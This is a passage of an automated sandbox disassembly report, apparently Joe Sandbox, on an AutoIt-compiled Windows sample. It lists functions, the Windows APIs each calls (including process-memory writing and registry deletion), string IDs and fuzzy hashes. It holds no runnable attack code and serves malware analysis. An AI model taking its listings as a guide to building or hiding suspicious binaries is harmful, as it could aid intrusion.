                                                                                                                  • Part of subcall function 00604750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00604743,?,?,006037AE,?), ref: 00604770
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0066B9BB
                                                                                                                • CoCreateInstance.OLE32(00692D6C,00000000,00000001,00692BDC,?), ref: 0066B9D4
                                                                                                                • CoUninitialize.OLE32 ref: 0066B9F1
                                                                                                                  • Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
                                                                                                                  • Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 2126378814-24824748
                                                                                                                • Opcode ID: c97299da52ef520fdd700a1ae1985f6114aac6522987b9bbe05a76031e591140
                                                                                                                • Instruction ID: da36892e21197c175110265fa734aa64943256885c820e88c0f64ebf181d2648
                                                                                                                • Opcode Fuzzy Hash: c97299da52ef520fdd700a1ae1985f6114aac6522987b9bbe05a76031e591140
                                                                                                                • Instruction Fuzzy Hash: 80A11475604205DFCB14DF24C484D6ABBE6FF89314F148998F8999B3A2CB31ED85CB91
                                                                                                                APIs
                                                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 0065B4BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContainedObject
                                                                                                                • String ID: AutoIt3GUI$Container$%i
                                                                                                                • API String ID: 3565006973-3322876330
                                                                                                                • Opcode ID: b9f088001b0c35a562e1d2f20fef9a3152a4df85f40b5b8be2ca63c3be93b8f6
                                                                                                                • Instruction ID: f826b951e0e6ae26517430b985dd049bdf80a799e4d5cca3aaaa4248fef0be74
                                                                                                                • Opcode Fuzzy Hash: b9f088001b0c35a562e1d2f20fef9a3152a4df85f40b5b8be2ca63c3be93b8f6
                                                                                                                • Instruction Fuzzy Hash: D2915A70200601AFDB54CF64C884AAABBEAFF48711F20956DED4ACB391EB70E845CB50
                                                                                                                APIs
                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 006250AD
                                                                                                                  • Part of subcall function 006300F0: __87except.LIBCMT ref: 0063012B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorHandling__87except__start
                                                                                                                • String ID: pow
                                                                                                                • API String ID: 2905807303-2276729525
                                                                                                                • Opcode ID: b7e97d404786f02da4ae89989049a1ffbd5e2594051f851bd97d61121df551a5
                                                                                                                • Instruction ID: 3fa18f2ea559bf9e4c8b0ccf9cd9a943e561f0f850fded9b51a9515b95b33a58
                                                                                                                • Opcode Fuzzy Hash: b7e97d404786f02da4ae89989049a1ffbd5e2594051f851bd97d61121df551a5
                                                                                                                • Instruction Fuzzy Hash: 35515A71918D0296EB317B14DD253BE2B979B40700F208959E4D6863A9EE348DDCDFCA
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID: 3ca$_a
                                                                                                                • API String ID: 4104443479-1000881220
                                                                                                                • Opcode ID: 5e89f71789ef3079a96b4989e8a32a88311e4b4f2989eb3ea68c097db1030c53
                                                                                                                • Instruction ID: 0ef1cc414352d3f700bc36bd06735495045b99c0a7ade4e329f0ce46aca6c1f6
                                                                                                                • Opcode Fuzzy Hash: 5e89f71789ef3079a96b4989e8a32a88311e4b4f2989eb3ea68c097db1030c53
                                                                                                                • Instruction Fuzzy Hash: 7F513B709006199FCB64CF68D880AEEBBF2FF45314F148529E85AD7350EB31A995CF51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 006614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00659296,?,?,00000034,00000800,?,00000034), ref: 006614E6
                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0065983F
                                                                                                                  • Part of subcall function 00661487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006614B1
                                                                                                                  • Part of subcall function 006613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00661409
                                                                                                                  • Part of subcall function 006613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0065925A,00000034,?,?,00001004,00000000,00000000), ref: 00661419
                                                                                                                  • Part of subcall function 006613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0065925A,00000034,?,?,00001004,00000000,00000000), ref: 0066142F
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006598AC
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006598F9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                • String ID: @
                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                • Opcode ID: 34b819b5d4d497771f6c5a512fef96c117ebce629ab933276f989d857f00016e
                                                                                                                • Instruction ID: 68c7785af9dbe4a45794aaf89e2019959b58b67def9a12f0718cd7760362f0ad
                                                                                                                • Opcode Fuzzy Hash: 34b819b5d4d497771f6c5a512fef96c117ebce629ab933276f989d857f00016e
                                                                                                                • Instruction Fuzzy Hash: AB41537690021CBFDB10DFA4CC41ADEBBB9EF06300F144159F945B7251DA716E89CBA0
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0068F910,00000000,?,?,?,?), ref: 006879DF
                                                                                                                • GetWindowLongW.USER32 ref: 006879FC
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00687A0C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long
                                                                                                                • String ID: SysTreeView32
                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                • Opcode ID: aa8bce48d648b84ce8cc7d2bff2800801f5994d3b2e2158be64c008d03445340
                                                                                                                • Instruction ID: 36d1e34b4f0bdcc8d8102cf0d8f44b59fa52d109ad47ce0847b3c9366365e107
                                                                                                                • Opcode Fuzzy Hash: aa8bce48d648b84ce8cc7d2bff2800801f5994d3b2e2158be64c008d03445340
                                                                                                                • Instruction Fuzzy Hash: FC31CE31204206ABDF15AF38DC45BEB77AAEF05324F204729F875A22E0D730ED919B60
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00687461
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00687475
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00687499
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: SysMonthCal32
                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                • Opcode ID: bce9470168720e6bfbb459c058ebc21251cf224f5a6410dbc69692e97d7aa257
                                                                                                                • Instruction ID: 8dfff141c00aea3f8a63f388e5b761437d17464420e10065faeca8c8ac249fc0
                                                                                                                • Opcode Fuzzy Hash: bce9470168720e6bfbb459c058ebc21251cf224f5a6410dbc69692e97d7aa257
                                                                                                                • Instruction Fuzzy Hash: D8219132540218BBDF15DF94DC46FEA3BAAEF48724F210214FE156B1D0DA75EC919BA0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00686D3B
                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00686D4B
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00686D70
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                • String ID: Listbox
                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                • Opcode ID: a8a3c1c2c787b4954c886ffa1b003fe8101b283c0ad4c9b205ca97f1501021b5
                                                                                                                • Instruction ID: 58a9ae53e6e1bf3e76739ae48566f0a8e495b52c0c1b7fd56ad3d17f1cbce158
                                                                                                                • Opcode Fuzzy Hash: a8a3c1c2c787b4954c886ffa1b003fe8101b283c0ad4c9b205ca97f1501021b5
                                                                                                                • Instruction Fuzzy Hash: FE218032650118BFDF129F54DC45EEB3BBBEF89750F118228FA459B2A0C671AC5187A0
                                                                                                                APIs
                                                                                                                • __snwprintf.LIBCMT ref: 00673A66
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __snwprintf_memmove
                                                                                                                • String ID: , $$AUTOITCALLVARIABLE%d$%i
                                                                                                                • API String ID: 3506404897-3841533268
                                                                                                                • Opcode ID: 914b4d1b13d9ea5eb65089ff36722a3af6a902451aa6473dc873eae9ed776da2
                                                                                                                • Instruction ID: cdfa73a88187a52db760ea11007a93ba090570a584acbe1a9dcd3d2445faedae
                                                                                                                • Opcode Fuzzy Hash: 914b4d1b13d9ea5eb65089ff36722a3af6a902451aa6473dc873eae9ed776da2
                                                                                                                • Instruction Fuzzy Hash: 6F219870640219AFCF54EF54CC42AEE77BBAF44300F504458F449A7281DB30EA45DB65
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00687772
                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00687787
                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00687794
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: msctls_trackbar32
                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                • Opcode ID: 7ec0fb68df0f9fba8355d75e44c7ec791f132314638a0e30697f8ed04e5c22ec
                                                                                                                • Instruction ID: c3fb757a7b1103d03ac10a5353c4b65d87f833d1f1c09de948634cd772fd20b5
                                                                                                                • Opcode Fuzzy Hash: 7ec0fb68df0f9fba8355d75e44c7ec791f132314638a0e30697f8ed04e5c22ec
                                                                                                                • Instruction Fuzzy Hash: F811E772244208BAEF146F65CC05FEB776AEF89B54F114218F641A61D0D671E851CB20
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __calloc_crt
                                                                                                                • String ID: k$@Bl
                                                                                                                • API String ID: 3494438863-2030202147
                                                                                                                • Opcode ID: 8c5d853f41c4a0784f8da3b0a3c18c920f89c87a7c8892042526b7b81cff0e60
                                                                                                                • Instruction ID: 0606359a703258cbbc2d70fc503c3c4ecb42998c5aa4759c084187ddf372f8c3
                                                                                                                • Opcode Fuzzy Hash: 8c5d853f41c4a0784f8da3b0a3c18c920f89c87a7c8892042526b7b81cff0e60
                                                                                                                • Instruction Fuzzy Hash: D4F04F71209E228FE7649F68FC51EA66BD7E710770F50141AF502CF290EB74A9D18BC4
                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 00629B94
                                                                                                                  • Part of subcall function 00629C0B: __mtinitlocknum.LIBCMT ref: 00629C1D
                                                                                                                  • Part of subcall function 00629C0B: EnterCriticalSection.KERNEL32(00000000,?,00629A7C,0000000D), ref: 00629C36
                                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00629BA4
                                                                                                                  • Part of subcall function 00629100: ___addlocaleref.LIBCMT ref: 0062911C
                                                                                                                  • Part of subcall function 00629100: ___removelocaleref.LIBCMT ref: 00629127
                                                                                                                  • Part of subcall function 00629100: ___freetlocinfo.LIBCMT ref: 0062913B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                                                                • String ID: 8k$8k
                                                                                                                • API String ID: 547918592-2854333805
                                                                                                                • Opcode ID: 4fddad08e44fd6b19cb8ae66126cf41794be66e5198bd039f66e3a7e771b1a26
                                                                                                                • Instruction ID: 84cd6b08aca6446b93844559a48c514dc5e67aa61b40db05c43c5d3e90df8e35
                                                                                                                • Opcode Fuzzy Hash: 4fddad08e44fd6b19cb8ae66126cf41794be66e5198bd039f66e3a7e771b1a26
                                                                                                                • Instruction Fuzzy Hash: 68E08CB1943B20ABEBA4BBA87E07BC926639B80B22F20125EF055560C1CD7104C08E2F
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00604B83,?), ref: 00604C44
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00604C56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 2574300362-1355242751
                                                                                                                • Opcode ID: 107aaedabc6072b961b8bc5e9aaa1277de6979cb9f28a79764b8f37eaf159cf6
                                                                                                                • Instruction ID: c6519d7a7ea1d66f8f7076ae7da922a312cf93c070ae6cb72b1cb9fdbb3151ff
                                                                                                                • Opcode Fuzzy Hash: 107aaedabc6072b961b8bc5e9aaa1277de6979cb9f28a79764b8f37eaf159cf6
                                                                                                                • Instruction Fuzzy Hash: 67D0C7B0600713DFE7349F31C80828A72E6AF00351B12883E95D2D62A0EA70C8C0CB20
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00604BD0,?,00604DEF,?,006C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604C11
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00604C23
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 2574300362-3689287502
                                                                                                                • Opcode ID: 337abe39cfaa19464ae581b1546223c74f76c5a8dad699b87a0f7f7d03338640
                                                                                                                • Instruction ID: 2a2c75e182bdff9088ba68e4fe986e9de8351d06342402d2c9de8886ceef9fd9
                                                                                                                • Opcode Fuzzy Hash: 337abe39cfaa19464ae581b1546223c74f76c5a8dad699b87a0f7f7d03338640
                                                                                                                • Instruction Fuzzy Hash: 99D0EC71551712DFD7206F71D90868BB6D7AF09752B1199399486D6290EAB0D8808750
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00681039), ref: 00680DF5
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00680E07
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                • API String ID: 2574300362-4033151799
                                                                                                                • Opcode ID: 9ac1046dc28fa6b1d3a71984f3bec10702de9cc8d81cd37abaa9cf7ddcaafcad
                                                                                                                • Instruction ID: 9a69a93353b2f178fde71b88dd246463c29e33ebc3425490e4e4ea89008eca1c
                                                                                                                • Opcode Fuzzy Hash: 9ac1046dc28fa6b1d3a71984f3bec10702de9cc8d81cd37abaa9cf7ddcaafcad
                                                                                                                • Instruction Fuzzy Hash: 92D0E2B1550722DFE720AF75C80C6C776E6AF04752F129D2E9586D2250EAB0D8948B60
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00678CF4,?,0068F910), ref: 006790EE
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00679100
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetModuleHandleExW$kernel32.dll
